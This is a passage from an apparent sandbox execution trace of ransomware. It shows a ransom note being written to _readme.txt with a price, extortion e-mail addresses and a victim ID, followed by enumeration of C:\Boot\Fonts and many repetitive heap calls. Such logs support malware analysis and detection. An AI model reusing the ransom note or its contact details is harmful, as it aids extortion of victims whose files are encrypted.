and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1107 [0093.921] WriteFile (in: hFile=0x5c8, lpBuffer=0x32d0db8*, nNumberOfBytesToWrite=0x453, lpNumberOfBytesWritten=0x9e2fb64, lpOverlapped=0x0 | out: lpBuffer=0x32d0db8*, lpNumberOfBytesWritten=0x9e2fb64*=0x453, lpOverlapped=0x0) returned 1 [0093.922] CloseHandle (hObject=0x5c8) returned 1 [0093.923] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0093.923] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79fd8 | out: hHeap=0x630000) returned 1 [0093.923] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0093.923] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.923] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.923] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa187f1a0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa187f1a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0093.924] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.924] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa187f1a0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa187f1a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.924] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0093.924] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac191e00, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac191e00, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6505f253, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0093.924] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac204220, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac204220, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65274577, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0093.924] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac22a380, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac22a380, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0093.924] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0093.924] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1859040, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1859040, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa187f1a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0093.924] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1859040, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1859040, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa187f1a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0093.924] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0093.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fd20 | out: hHeap=0x630000) returned 1 [0093.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fd20 [0093.925] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0093.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.926] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.926] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.926] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.926] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.926] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.926] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.926] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.926] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.926] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.926] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.926] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.926] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.926] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.926] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.926] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.926] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.927] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.927] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x32cf950 [0093.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.927] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.927] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.927] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.927] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.927] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.927] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.928] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.928] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.928] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.928] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.928] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.928] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.928] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.929] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.929] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.929] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.929] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.929] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.929] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.929] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.929] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.930] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.930] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.930] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.930] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.930] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.930] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.930] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.930] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.930] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.930] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.930] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.930] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.930] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.930] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.931] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.931] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.931] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.931] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.931] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.931] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.931] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.931] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0093.931] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.931] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.931] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.931] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.931] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.931] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.932] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.932] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.932] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.932] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x32cf950 [0093.932] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.932] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.932] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.932] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.932] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.932] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.932] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.932] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.932] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.932] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.933] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.933] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.933] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.933] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.933] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.933] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.933] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.933] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.933] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.933] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.933] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.933] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0093.933] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.933] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.933] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.933] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.933] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.933] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.933] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.934] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.934] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.934] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.934] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.934] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.934] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.935] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.935] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.935] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.935] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.935] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.936] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.936] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.936] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.936] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.936] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.936] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.936] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.936] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.936] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.936] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.937] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.937] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.937] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.937] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.937] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.937] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0093.937] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.937] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.937] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.937] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.937] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.937] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.937] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.937] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.937] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.937] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.937] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0093.937] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, 